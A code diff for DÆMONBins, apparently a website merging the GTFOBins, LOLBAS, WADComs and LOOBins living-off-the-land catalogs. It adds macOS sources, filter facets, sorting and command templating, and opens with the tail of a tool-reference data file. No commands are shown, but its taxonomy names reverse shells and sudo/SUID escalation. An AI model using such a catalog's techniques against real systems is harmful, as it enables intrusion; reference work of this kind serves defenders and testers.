eckpoint.com/src/MacOS/macos.html"],"count":1},{"id":"loobins:system_profiler","name":"system_profiler","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml","https://macosbin.com/bin/system_profiler","https://ss64.com/osx/system_profiler.html"],"count":5},{"id":"loobins:systemsetup","name":"systemsetup","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/systemsetup.yml","https://ss64.com/osx/systemsetup.html"],"count":2},{"id":"loobins:tccutil","name":"tccutil","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tccutil.yml","https://ss64.com/mac/tccutil.html","https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/"],"count":2},{"id":"loobins:tclsh","name":"tclsh","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tclsh.yml","https://medium.com/specter-ops-posts/dylib-loads-that-tickle-your-fancy-d25196addd8c"],"count":1},{"id":"loobins:textutil","name":"textutil","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/textutil.yml","https://osxdaily.com/tag/textutil/"],"count":2},{"id":"loobins:tftp","name":"tftp","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tftp.yml","https://ss64.com/mac/tftp.html","https://en.wikipedia.org/https://hackviser.com/tactics/pentesting/services/tftp","https://www.stamus-networks.com/blog/uncovered-uncovering-risk-exposure-from-publicly-accessible-unauthenticated-tftp","https://attack.mitre.org/techniques/T1105/","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"count":3},{"id":"loobins:tmutil","name":"tmutil","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml","https://theevilbit.github.io/posts/cve_2020_9771/","https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd"],"count":5},{"id":"loobins:xattr","name":"xattr","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/xattr.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be"],"count":2},{"id":"daemon:aws","name":"aws","source":"DAEMON","platform":["Linux","Windows","macOS"],"references":["https://docs.aws.amazon.com/cli/latest/reference/sts/get-caller-identity.html","https://docs.aws.amazon.com/cli/latest/reference/configure/list.html","https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-regions.html"],"count":3},{"id":"daemon:az","name":"az","source":"DAEMON","platform":["Linux","Windows","macOS"],"references":["https://learn.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest#az-account-show","https://learn.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest#az-account-list"],"count":2},{"id":"daemon:gcloud","name":"gcloud","source":"DAEMON","platform":["Linux","Windows","macOS"],"references":["https://cloud.google.com/sdk/gcloud/reference/projects/list","https://cloud.google.com/sdk/gcloud/reference/config/list","https://cloud.google.com/sdk/gcloud/reference/projects/get-iam-policy"],"count":3}] diff --git a/src/layouts/Base.astro b/src/layouts/Base.astro @@ -22,7 +22,7 @@ interface Props { const { jsonLd, title = 'DÆMONBins — the Off-the-Land Almanac', - description = 'One filterable catalog merging GTFOBins, LOLBAS and WADComs — plus DÆMON modern additions. Living-off-the-land and offensive techniques by platform, capability and source.', + description = 'One filterable catalog merging GTFOBins, LOLBAS, WADComs and LOOBins — plus DÆMON additions. Living-off-the-land and offensive techniques by platform, access, environment and evidence state.', } = Astro.props; // Canonical = site origin + slash-less path (`trailingSlash: 'never'` in // astro.config.mjs; vercel.json 308s `/x/` → `/x`, so a slashed canonical @@ -53,7 +53,7 @@ const ogImage = new URL('og.png', Astro.site).href; <meta property="og:image" content={ogImage} /> <meta property="og:image:width" content="1200" /> <meta property="og:image:height" content="630" /> - <meta property="og:image:alt" content="DÆMONBins — the Off-the-Land Almanac: GTFOBins × LOLBAS × WADComs merged into one catalog" /> + <meta property="og:image:alt" content="DÆMONBins — the Off-the-Land Almanac: GTFOBins × LOLBAS × WADComs × LOOBins merged into one catalog" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:title" content={title} /> <meta name="twitter:description" content={description} /> @@ -64,6 +64,8 @@ const ogImage = new URL('og.png', Astro.site).href; (function () { function apply() { try { + var display = JSON.parse(localStorage.getItem('daemonbins:display') || '{}'); + document.documentElement.dataset.motion = display.motion ? 'reduce' : 'system'; var t = localStorage.getItem('theme'); // No stored choice: follow the OS. Dawn (cream) is the default when // the OS has no preference, matching the main DÆMON site — but a diff --git a/src/lib/catalog-workspace.ts b/src/lib/catalog-workspace.ts @@ -0,0 +1,35 @@ +import { FACET_KEYS, facetValues, matches, type Technique, type CatalogFilters, type FacetKey } from './techniques'; +export type SortOrder = 'tool' | 'source' | 'reviewed'; +export function sortTechniques(rows: Technique[], order: SortOrder, query = ''): Technique[] { + const needle = query.trim().toLowerCase(); + return [...rows].sort((a, b) => { + const exact = Number(b.toolName.toLowerCase() === needle) - Number(a.toolName.toLowerCase() === needle); + if (exact) return exact; + if (order === 'reviewed') { const date = (b.reviewedAt || '').localeCompare(a.reviewedAt || ''); if (date) return date; } + if (order === 'source') { const source = a.source.localeCompare(b.source); if (source) return source; } + return a.toolName.localeCompare(b.toolName, 'en', { numeric: true, sensitivity: 'base' }) || a.id.localeCompare(b.id); + }); +} +export function groupTechniques(rows: Technique[]): Technique[][] { + const groups = new Map<string, Technique[]>(); + for (const t of rows) { const group = groups.get(t.toolId) || []; group.push(t); groups.set(t.toolId, group); } + return [...groups.values()]; +} +export function contextualCounts(rows: Technique[], filters: CatalogFilters): Record<FacetKey, Record<string, number>> { + return Object.fromEntries(FACET_KEYS.map(key => { + const counts: Record<string, number> = {}; + for (const t of rows) if (matches(t, { ...filters, [key]: [] })) for (const value of facetValues(t, key)) counts[value] = (counts[value] || 0) + 1; + return [key, counts]; + })) as Record<FacetKey, Record<string, number>>; +} +export function quoteArgument(value: string, shell: 'posix' | 'powershell'): string { + if (/[\r\n\0]/.test(value)) throw new Error('Use a single-line value.'); + return shell === 'powershell' ? `'${value.replace(/'/g, "''")}'` : `'${value.replace(/'/g, "'\"'\"'")}'`; +} +export function configureCommand(template: NonNullable<Technique['template']>, values: Record<string, string>): string { + const keys = new Set(template.variables.map(v => v.key)); + return template.command.replace(/\{\{([a-z][a-z0-9_]*)\}\}/g, (_, key: string) => { + if (!keys.has(key)) throw new Error(`Unknown variable: ${key}`); + return quoteArgument(values[key] ?? template.variables.find(v => v.key === key)!.default, template.shell); + }); +} diff --git a/src/lib/jsonld.ts b/src/lib/jsonld.ts @@ -53,7 +53,7 @@ export function dataset( '@type': 'Dataset', '@id': `${abs(site, '/')}#dataset`, name: `${SITE_NAME} technique index`, - description: `${counts.techniques} living-off-the-land and offensive techniques across ${counts.tools} tools, merged from GTFOBins, LOLBAS and WADComs with DÆMON-authored additions; each mapped to MITRE ATT&CK.`, + description: `${counts.techniques} command references across ${counts.tools} tools, from GTFOBins, LOLBAS, WADComs and LOOBins with DÆMON-authored additions. ATT&CK mappings are included where available.`, url: abs(site, '/catalog'), license: GPL, isAccessibleForFree: true, diff --git a/src/lib/render-row.ts b/src/lib/render-row.ts @@ -4,9 +4,10 @@ // which is what lets the island adopt the server's markup without a re-render. import { toolRoute, type Technique } from './techniques'; -import { PLATFORMS, CAPABILITIES, SOURCES, PLATFORM_META, CAPABILITY_META, SOURCE_META } from './taxonomy'; +import { PLATFORM_META, CAPABILITY_META, SOURCE_META } from './taxonomy'; import { escapeHtml as esc, highlightCommand } from './highlight'; import { url } from './url'; +import { FACET_KEYS, facetValues, searchText, type CatalogFilters } from './techniques'; /** Rows per page, server and client alike. */ export const PAGE = 40; @@ -21,6 +22,8 @@ export const PAGE = 40; export const LIST_FIELDS = [ 'id', 'toolId', 'toolName', 'name', 'source', 'platform', 'capability', 'nativeCategory', 'command', 'description', 'usecase', 'mitre', 'privilege', 'added', + 'context', 'requires', 'services', 'environment', 'aliases', 'availability', 'verification', + 'reviewedAt', 'compatibility', 'expected', 'troubleshooting', 'sideEffects', 'restore', 'template', 'references', 'detection', ] as const; export type ListTechnique = Pick<Technique, (typeof LIST_FIELDS)[number]>; @@ -41,15 +44,19 @@ export function facetGroup(title: string, kind: string, values: readonly string[ return `<section class="cat-facet"><p class="cat-facet__head eyebrow"><span class="eyebrow__mark">^:</span><span>${esc(title)}</span></p><div class="cat-facet__chips">${chips}</div></section>`; } -export interface FacetCounts { platform: Record<string, number>; capability: Record<string, number>; source: Record<string, number> } +export type FacetCounts = Partial<Record<(typeof FACET_KEYS)[number], Record<string, number>>>; +export function totalFacetCounts(rows: Technique[]): FacetCounts { + return Object.fromEntries(FACET_KEYS.map(k => { + const counts: Record<string, number> = {}; + for (const t of rows) for (const v of facetValues(t, k)) counts[v] = (counts[v] || 0) + 1; + return [k, counts]; + })); +} /** The whole facet rail: three groups, chip counts are dataset totals. */ -export function renderFacets(active: { platform: string[]; capability: string[]; source: string[] }, counts: FacetCounts): string { - return ( - facetGroup('Platform', 'platform', PLATFORMS, (v) => PLATFORM_META[v as keyof typeof PLATFORM_META].accent, active.platform, counts.platform) + - facetGroup('Capability', 'capability', CAPABILITIES, (v) => CAPABILITY_META[v]?.accent || 'foam', active.capability, counts.capability) + - facetGroup('Source', 'source', SOURCES, (v) => SOURCE_META[v as keyof typeof SOURCE_META].accent, active.source, counts.source) - ); +export function renderFacets(active: Pick<CatalogFilters, 'platform' | 'capability' | 'source'> & Partial<CatalogFilters>, counts: FacetCounts): string { + const titles = { platform: 'Operating system / target', capability: 'Capability', source: 'Collection', context: 'Execution context', requires: 'Required access', services: 'Service', environment: 'Environment', availability: 'Availability', verification: 'Evidence' }; + return FACET_KEYS.map(k => facetGroup(titles[k], k, Object.keys(counts[k] || {}).sort(), () => k === 'source' ? 'rose' : 'foam', active[k] || [], counts[k] || {})).join(''); } // ---- badges ---------------------------------------------------------------- @@ -60,12 +67,12 @@ export const badge = (label: string, accent: string, extra = '') => /** A DOM id for the detail panel so the expander can name what it controls. */ export const panelId = (id: string) => `td-${id.replace(/[^A-Za-z0-9_-]+/g, '-')}`; -export function renderRow(t: ListTechnique): string { +export function renderRow(t: ListTechnique, variants: ListTechnique[] = []): string { const caps = t.capability.map((c) => badge(c, CAPABILITY_META[c]?.accent || 'foam')).join(''); const plats = t.platform.map((p) => badge(p, PLATFORM_META[p]?.accent || 'foam', 'tbadge--soft')).join(''); const src = SOURCE_META[t.source]; const srcBadge = badge(src.label, src.accent, 'tbadge--src'); - const newBadge = t.added ? `<span class="tbadge tbadge--new" style="--acc: var(--love);">NEW</span>` : ''; + const newBadge = t.added && t.source !== 'DAEMON' ? `<span class="tbadge tbadge--new" style="--acc: var(--love);">DÆMON</span>` : ''; const label = t.name && t.name !== t.toolName ? `<span class="trow__sub">${esc(t.name)}</span>` : ''; const route = url(toolRoute(t.toolId)); const pid = panelId(t.id); @@ -77,15 +84,17 @@ export function renderRow(t: ListTechnique): string { const more = `<a class="tdetail__more" href="${route}#${esc(t.id)}">Full details on the ${esc(t.toolName)} page — detection, references, paths →</a>`; return `<article class="trow" data-id="${esc(t.id)}"> - <button class="trow__head" type="button" aria-expanded="false" aria-controls="${pid}"> - <span class="trow__chev" aria-hidden="true">›</span> + <div class="trow__head"> + <button class="trow__inspect" type="button" data-inspect aria-label="Details for ${esc(t.toolName)}" aria-controls="catalog-inspector">↗</button> <span class="trow__name"><a href="${route}" class="trow__tool">${esc(t.toolName)}</a>${label}</span> <span class="trow__badges">${srcBadge}${newBadge}${caps}${plats}</span> - </button> + </div> + ${variants.length > 1 ? `<label class="trow__variants">${variants.length} matching variants <select data-variant aria-label="Technique variant for ${esc(t.toolName)}">${variants.map(v => `<option value="${esc(v.id)}" ${v.id === t.id ? 'selected' : ''}>${esc(v.name || v.capability.join(', '))} · ${esc(v.context || v.privilege || 'see prerequisites')}</option>`).join('')}</select></label>` : ''} <div class="trow__cmdbar" data-cmdbar> <pre class="trow__cmd"><code>${highlightCommand(t.command)}</code></pre> <button class="trow__copy" type="button" data-copy aria-label="Copy command">copy</button> </div> + <div class="trow__actions"><span>${esc(t.context || t.privilege || t.environment?.join(', ') || 'See prerequisites')}</span><button data-save type="button" aria-pressed="false">Save</button><button data-inspect type="button" aria-controls="catalog-inspector">${t.template ? 'Configure & details' : 'Details & sources'}</button></div> <div class="trow__detail" id="${pid}" hidden> ${desc}${use} <div class="tdetail__grid">${priv}${mitre}</div> @@ -98,7 +107,7 @@ export const EMPTY_HTML = `<div class="cat-empty"><p class="eyebrow" style="--ac /** The count line and the "Show more" label, so server and client agree. */ export function countLabel(shown: number, total: number, activeFacets: number, addedOnly: boolean): string { - return `<strong>${shown}</strong> of ${total} techniques${activeFacets ? ` · ${String(activeFacets).padStart(2, '0')} facet${activeFacets > 1 ? 's' : ''}` : ''}${addedOnly ? ' · NEW only' : ''}`; + return `<strong>${shown.toLocaleString()}</strong> of ${total.toLocaleString()} techniques${activeFacets ? ` · ${activeFacets} filter${activeFacets === 1 ? '' : 's'}` : ''}${addedOnly ? ' · DÆMON authored' : ''}`; } export function moreLabel(remaining: number): string { return `Show ${Math.min(remaining, PAGE)} more · ${remaining} remaining`; @@ -109,8 +118,5 @@ export function moreLabel(remaining: number): string { * record at boot instead of once per record per keystroke. */ export function haystack(t: ListTechnique): string { - return [t.toolName, t.name, t.command, t.description, t.usecase, ...(t.nativeCategory || []), ...(t.mitre || [])] - .filter(Boolean) - .join(' ') - .toLowerCase(); + return searchText(t as Technique); } diff --git a/src/lib/taxonomy.ts b/src/lib/taxonomy.ts @@ -5,10 +5,10 @@ export type Accent = 'love' | 'iris' | 'pine' | 'foam' | 'gold' | 'rose'; export type Platform = 'Linux' | 'Windows' | 'macOS' | 'ActiveDirectory'; -export type SourceId = 'GTFOBins' | 'LOLBAS' | 'WADComs' | 'DAEMON'; +export type SourceId = 'GTFOBins' | 'LOLBAS' | 'WADComs' | 'LOOBins' | 'DAEMON'; export const PLATFORMS: Platform[] = ['Linux', 'Windows', 'macOS', 'ActiveDirectory']; -export const SOURCES: SourceId[] = ['GTFOBins', 'LOLBAS', 'WADComs', 'DAEMON']; +export const SOURCES: SourceId[] = ['GTFOBins', 'LOLBAS', 'WADComs', 'LOOBins', 'DAEMON']; export const CAPABILITIES = [ 'Execution', 'Reverse/Bind Shell', @@ -33,6 +33,12 @@ export interface SourceDef { } export const SOURCE_META: Record<SourceId, SourceDef> = { + LOOBins: { + id: 'LOOBins', label: 'LOOBins', tag: 'ORCHARD', accent: 'rose', + blurb: 'Native macOS binaries, with upstream use cases, paths, detection references and explicit compatibility notes.', + homepage: 'https://loobins.io/', repo: 'https://github.com/infosecB/LOOBins', + author: 'Brendan Chamberlain (@infosecB) & contributors', license: 'GPL-3.0', + }, GTFOBins: { id: 'GTFOBins', label: 'GTFOBins', tag: 'GTFO', accent: 'foam', blurb: 'Unix binaries abused to break out of restricted shells, read/write files, and escalate via SUID, sudo, and capabilities.', @@ -53,7 +59,7 @@ export const SOURCE_META: Record<SourceId, SourceDef> = { }, DAEMON: { id: 'DAEMON', label: 'DÆMON', tag: 'DMN', accent: 'love', - blurb: 'Authored here — modern 2024–2026 tradecraft the three upstreams lack, plus 134 fact-checked Windows/AD additions. Every entry carries a canonical reference.', + blurb: 'Authored command references for Windows, Active Directory, containers and cloud administration. Verification and prerequisites are recorded per entry.', homepage: 'https://daemon-sec.xyz', repo: 'https://github.com/DAEMON-404/daemon-sec-lotl', author: 'DÆMON (DAEMON-404)', license: 'GPL-3.0', }, @@ -96,7 +102,7 @@ export function accentOf(kind: 'platform' | 'capability' | 'source', value: stri /** Slug a source id for the /<source>/<tool> route prefix. */ export const SOURCE_ROUTE: Record<SourceId, string> = { - GTFOBins: 'gtfobins', LOLBAS: 'lolbas', WADComs: 'wadcoms', DAEMON: 'daemon', + GTFOBins: 'gtfobins', LOLBAS: 'lolbas', WADComs: 'wadcoms', LOOBins: 'loobins', DAEMON: 'daemon', }; // A tool's route deck is decided by its toolId NAMESPACE (the prefix before @@ -106,5 +112,5 @@ export const SOURCE_ROUTE: Record<SourceId, string> = { // namespace (they extend that collection); the daemon: namespace is the // standalone modernization backlog. export const NS_SOURCE: Record<string, SourceId> = { - gtfo: 'GTFOBins', lolbas: 'LOLBAS', wadcoms: 'WADComs', daemon: 'DAEMON', + gtfo: 'GTFOBins', lolbas: 'LOLBAS', wadcoms: 'WADComs', loobins: 'LOOBins', daemon: 'DAEMON', }; diff --git a/src/lib/techniques.ts b/src/lib/techniques.ts @@ -48,6 +48,17 @@ export interface Technique { references: string[]; added?: boolean; verifyNote?: string; + environment?: string[]; + aliases?: string[]; + availability?: string; + verification?: string; + reviewedAt?: string; + compatibility?: string; + expected?: string; + troubleshooting?: string; + sideEffects?: string; + restore?: string; + template?: { command: string; shell: 'posix' | 'powershell'; variables: { key: string; label: string; default: string }[] }; } export interface Tool { @@ -71,6 +82,12 @@ export interface CatalogFilters { source: string[]; query: string; addedOnly: boolean; + context?: string[]; + requires?: string[]; + services?: string[]; + environment?: string[]; + availability?: string[]; + verification?: string[]; } export const EMPTY_FILTERS: CatalogFilters = { @@ -82,14 +99,24 @@ export const EMPTY_FILTERS: CatalogFilters = { const inFacet = (values: string[], selected: string[]) => selected.length === 0 || selected.some((s) => values.includes(s)); -function matchesQuery(t: Technique, q: string): boolean { - if (!q) return true; - const needle = q.toLowerCase(); - const hay = [t.toolName, t.name, t.command, t.description, t.usecase, ...(t.nativeCategory || []), ...(t.mitre || [])] +export function searchText(t: Technique): string { + return [t.toolName, t.name, t.command, t.description, t.usecase, t.context, t.privilege, + ...(t.aliases || []), ...(t.requires || []), ...(t.services || []), ...(t.environment || []), ...(t.nativeCategory || []), ...(t.mitre || [])] .filter(Boolean) .join(' ') .toLowerCase(); - return hay.includes(needle); +} + +export function matchesQuery(t: Technique, q: string): boolean { + const hay = searchText(t); + return q.toLowerCase().trim().split(/\s+/).every(word => hay.includes(word)); +} + +export const FACET_KEYS = ['platform', 'capability', 'source', 'context', 'requires', 'services', 'environment', 'availability', 'verification'] as const; +export type FacetKey = (typeof FACET_KEYS)[number]; +export function facetValues(t: Technique, key: FacetKey): string[] { + const v = key === 'context' ? (t.context || t.privilege) : t[key]; + return Array.isArray(v) ? v : v ? [v] : []; } export function matches(t: Technique, f: CatalogFilters): boolean { @@ -97,6 +124,7 @@ export function matches(t: Technique, f: CatalogFilters): boolean { if (!inFacet(t.platform, f.platform)) return false; if (!inFacet(t.capability, f.capability)) return false; if (!inFacet([t.source], f.source)) return false; + for (const key of FACET_KEYS.slice(3)) if (!inFacet(facetValues(t, key), f[key] || [])) return false; if (!matchesQuery(t, f.query)) return false; return true; } @@ -106,7 +134,7 @@ export function filterTechniques(techniques: Technique[], f: CatalogFilters): Te } export function countActive(f: CatalogFilters): number { - return f.platform.length + f.capability.length + f.source.length; + return FACET_KEYS.reduce((n, k) => n + (f[k]?.length || 0), 0); } export function isEmpty(f: CatalogFilters): boolean { @@ -114,13 +142,13 @@ export function isEmpty(f: CatalogFilters): boolean { } // URL <-> filters. Comma-joined multi-values so a narrowed view is shareable. -const PARAM_KEYS = { platform: 'p', capability: 'c', source: 's' } as const; +const PARAM_KEYS = { platform: 'p', capability: 'c', source: 's', context: 'ctx', requires: 'access', services: 'svc', environment: 'env', availability: 'available', verification: 'verified' } as const; export function filtersToSearch(f: CatalogFilters): string { const params = new URLSearchParams(); for (const [key, param] of Object.entries(PARAM_KEYS) as [keyof typeof PARAM_KEYS, string][]) { const vals = f[key]; - if (vals.length) params.set(param, vals.join(',')); + if (vals?.length) params.set(param, vals.join(',')); } if (f.addedOnly) params.set('new', '1'); const q = f.query.trim(); @@ -132,6 +160,7 @@ export function filtersFromSearch(search: string): CatalogFilters { const params = new URLSearchParams(search.startsWith('?') ? search.slice(1) : search); const list = (k: string) => (params.get(k) || '').split(',').map((s) => s.trim()).filter(Boolean); return { + ...Object.fromEntries(Object.entries(PARAM_KEYS).slice(3).filter(([, param]) => list(param).length).map(([key, param]) => [key, list(param)])), platform: list(PARAM_KEYS.platform), capability: list(PARAM_KEYS.capability), source: list(PARAM_KEYS.source), diff --git a/src/pages/[source]/[tool].astro b/src/pages/[source]/[tool].astro @@ -40,7 +40,7 @@ const { tool, techniques } = Astro.props; // addition (wadcoms:Certipy) reads under the WADComs deck; per-technique NEW // badges convey which rows are daemon-authored. const src = SOURCE_META[routeSourceOf(tool.id)]; -const upstream = tool.references?.find((r) => /gtfobins|lolbas|wadcoms/.test(r)) || src.homepage; +const upstream = tool.references?.find((r) => /gtfobins|lolbas|wadcoms|loobins/i.test(r)) || src.homepage; const deck = SOURCE_ROUTE[routeSourceOf(tool.id)]; const path = `/${deck}/${toolSlug(tool.id)}`; const jsonLd = [ @@ -96,7 +96,7 @@ const jsonLd = [ <header class="tech__head"> <div class="tech__title"> <h2 class="tech__name">{t.name && t.name !== t.toolName ? t.name : t.capability[0]}</h2> - {t.added ? <span class="tbadge tbadge--new" style="--acc: var(--love);">NEW</span> : null} + {t.added ? <span class="tbadge tbadge--new" style="--acc: var(--love);">DÆMON</span> : null} </div> <div class="tech__badges"> {t.capability.map((c) => ( @@ -117,6 +117,14 @@ const jsonLd = [ </div> <dl class="tech__meta"> + {t.verification ? (<div><dt>Evidence</dt><dd>{t.verification}{t.reviewedAt ? ` · reviewed ${t.reviewedAt}` : ''}</dd></div>) : null} + {t.environment?.length ? (<div><dt>Environment</dt><dd>{t.environment.join(', ')}</dd></div>) : null} + {t.compatibility ? (<div><dt>Compatibility</dt><dd>{t.compatibility}</dd></div>) : null} + {t.expected ? (<div><dt>Expected result</dt><dd>{t.expected}</dd></div>) : null} + {t.troubleshooting ? (<div><dt>Troubleshooting</dt><dd>{t.troubleshooting}</dd></div>) : null} + {t.sideEffects ? (<div><dt>Side effects</dt><dd>{t.sideEffects}</dd></div>) : null} + {t.restore ? (<div><dt>Restore</dt><dd>{t.restore}</dd></div>) : null} + {t.template ? (<div><dt>Template</dt><dd><a href={url(`catalog?id=${encodeURIComponent(t.id)}`)}>Configure this command in the catalog</a></dd></div>) : null} {t.privilege ? (<div><dt>Context</dt><dd>{t.privilege}</dd></div>) : null} {t.nativeCategory?.length ? (<div><dt>Native</dt><dd>{t.nativeCategory.join(', ')}</dd></div>) : null} {t.mitre?.length ? (<div><dt>MITRE</dt><dd>{t.mitre.map((m) => <a class="tchip-link" href={`https://attack.mitre.org/techniques/${m.replace('.', '/')}/`} target="_blank" rel="noopener">{m}</a>)}</dd></div>) : null} diff --git a/src/pages/catalog.astro b/src/pages/catalog.astro @@ -1,69 +1,58 @@ --- import Base from '../layouts/Base.astro'; -import SlantTitle from '../components/SlantTitle.astro'; import facets from '../data/facets.json'; import allTechniques from '../data/techniques.json'; import indexHash from '../data/index-hash.json'; -import type { Technique } from '../lib/techniques'; -import { PAGE, renderRow, renderFacets, toListTechnique, countLabel, moreLabel } from '../lib/render-row'; +import { EMPTY_FILTERS, type Technique } from '../lib/techniques'; +import { PAGE, renderRow, renderFacets, toListTechnique, totalFacetCounts } from '../lib/render-row'; +import { groupTechniques, sortTechniques } from '../lib/catalog-workspace'; import { collectionPage } from '../lib/jsonld'; import { url } from '../lib/url'; import '../styles/catalog.css'; - -const c = facets.counts; -const DESCRIPTION = "The Off-the-Land Almanac: every technique from GTFOBins, LOLBAS and WADComs, plus DÆMON's modern additions, as one filterable index by platform, capability and source."; - -// The first page and the facet rail are rendered here with the island's own -// renderers (src/lib/render-row.ts) so the catalog has content before — and -// without — JavaScript, and crawlers see real rows. The island adopts this -// markup on a plain load and only fetches the slim index to filter. -const techs = allTechniques as unknown as Technique[]; -const firstPage = techs.slice(0, PAGE).map((t) => renderRow(toListTechnique(t))).join(''); -const remaining = techs.length - Math.min(PAGE, techs.length); -const rail = renderFacets({ platform: [], capability: [], source: [] }, { - platform: c.byPlatform, capability: c.byCapability, source: c.bySource, -}); +import '../styles/workspace.css'; +const rows = allTechniques as unknown as Technique[]; +const groups = groupTechniques(sortTechniques(rows, 'tool')); +const description = 'Find commands by operating system, access, execution context and service. Configure documented templates and save useful techniques.'; --- -<Base - title="Catalog — DÆMONBins" - description={DESCRIPTION} - jsonLd={collectionPage(Astro.site, '/catalog', 'Catalog — DÆMONBins', DESCRIPTION)} -> - <div class="wrap" style="padding-top:1.5rem;"> - <SlantTitle - eyebrow="01 · Catalog" - title="Off-the-Land Almanac" - tone="love" - intro="Every abuse technique from GTFOBins, LOLBAS and WADComs — plus DÆMON's fact-checked modern additions — flattened to one filterable index. Filter by platform, capability and source; every row expands to the command, MITRE mapping, detection, and references." - > - <Fragment slot="meta"> - <span>{c.techniques.toLocaleString()} techniques</span> - <span>{c.tools.toLocaleString()} tools</span> - <span>{c.added} DÆMON</span> - <span>GPL-3.0</span> - </Fragment> - </SlantTitle> - - <div class="cat" data-catalog data-index-url={url(`data/${indexHash.file}`)}> - <aside class="cat__rail"> - <div class="cat__searchrow"> - <input class="cat__search" data-cat-search type="search" placeholder="search commands, tools, MITRE…" aria-label="Search techniques" /> - </div> - <div class="cat__toolbar"> - <button class="cat__btn" data-cat-new type="button" aria-pressed="false">NEW only</button> - <button class="cat__btn" data-cat-clear type="button">Clear</button> - </div> - <div class="cat__facets" data-cat-facets data-ssr set:html={rail}></div> - </aside> - <div class="cat__main"> - <div class="cat__meta" data-cat-count aria-live="polite" set:html={countLabel(techs.length, techs.length, 0, false)}></div> - <div class="cat__results" data-cat-results data-ssr set:html={firstPage}></div> - <div class="cat__morerow"><button class="cat__more" data-cat-more type="button" hidden={remaining <= 0}>{moreLabel(remaining)}</button></div> - </div> +<Base title="Catalog — DÆMONBins" description={description} jsonLd={collectionPage(Astro.site, '/catalog', 'Catalog — DÆMONBins', description)}> + <div class="workbench wrap" data-catalog data-index-url={url(`data/${indexHash.file}`)}> + <header class="workbench__heading"> + <div><p class="eyebrow">01 / THE COMMAND CATALOG</p><h1>Find your next command<span>.</span></h1><p>Know what you have. Find what applies.</p></div> + <div class="workbench__stats"><strong>{facets.counts.techniques.toLocaleString()}</strong> techniques <span>/</span> <strong>{facets.counts.tools}</strong> tools</div> + </header> + <div class="workbench__search"> + <label class="sr-only" for="catalog-query">Search commands, tools and prerequisites</label> + <span aria-hidden="true">⌕</span><input id="catalog-query" data-cat-search type="search" placeholder="Search tools, commands, access or ATT&CK…" autocomplete="off" /> + <button data-cat-clear type="button">Clear</button> + </div> + <div class="workbench__toolbar"> + <button data-filters-toggle type="button" aria-expanded="false" aria-controls="catalog-filters">Filters</button> + <button data-cat-new type="button" aria-pressed="false">DÆMON authored</button> + <button data-bookmarks-only type="button" aria-pressed="false">Saved <span data-bookmark-count>0</span></button> + <label>Sort <select data-sort><option value="tool">Tool A–Z</option><option value="source">Collection</option><option value="reviewed">Recently reviewed</option></select></label> + <label><input type="checkbox" data-group checked /> Group by tool</label> + <details class="display-options"><summary>Display</summary><div> + <label>Density <select data-density><option value="comfortable">Comfortable</option><option value="compact">Compact</option></select></label> + <label>Command size <select data-font><option value="13">13px</option><option value="15">15px</option><option value="17">17px</option></select></label> + <label><input type="checkbox" data-wrap /> Wrap commands</label> + <label><input type="checkbox" data-motion /> Reduce motion</label> + </div></details> + <button data-save-view type="button">Save view</button> + <label>Views <select data-views><option value="">Choose a saved view</option></select></label> + <button data-delete-view type="button" hidden>Delete view</button> + </div> + <div data-active-filters class="active-filters" aria-label="Active filters"></div> + <p class="workbench__status" data-workspace-status role="status"></p> + <div class="workbench__body"> + <aside id="catalog-filters" class="workbench__filters"><div class="filter-heading"><h2>Refine results</h2><span>OR within · AND across</span></div><div data-cat-facets set:html={renderFacets(EMPTY_FILTERS, totalFacetCounts(rows))}></div></aside> + <section class="workbench__results" aria-label="Command results"> + <div class="workbench__result-heading"><p data-cat-count aria-live="polite">{rows.length.toLocaleString()} techniques · {groups.length} tools</p><span>REFERENCE / COPY / CONFIGURE</span></div> + <div data-cat-results class="cat__results" set:html={groups.slice(0, PAGE).map(g => renderRow(toListTechnique(g[0]), g.map(toListTechnique))).join('')}></div> + <button class="cat__more" data-cat-more type="button">Show more tools</button> + <noscript><p>Search and configuration need JavaScript. Browse <a href={url('loobins')}>macOS</a>, <a href={url('gtfobins')}>Linux</a>, <a href={url('lolbas')}>Windows</a> or <a href={url('wadcoms')}>AD tools</a> for complete static references.</p></noscript> + </section> + <aside id="catalog-inspector" class="inspector" aria-label="Technique details" hidden></aside> </div> </div> - - <script> - import '../scripts/catalog.ts'; - </script> + <script>import '../scripts/catalog';</script> </Base> diff --git a/src/pages/credits.astro b/src/pages/credits.astro @@ -10,6 +10,11 @@ const commits = facets.commits as Record<string, string>; const CREDITS = [ { + id: 'LOOBins', commit: commits.loobins, + what: 'Each upstream macOS use case becomes a separate command record. Original names, descriptions, paths and detection references are retained. Tactics outside the catalog capability vocabulary remain in nativeCategory. Imported examples are not labelled as lab tested.', + count: c.bySource.LOOBins, + }, + { id: 'GTFOBins', commit: commits.gtfobins, what: 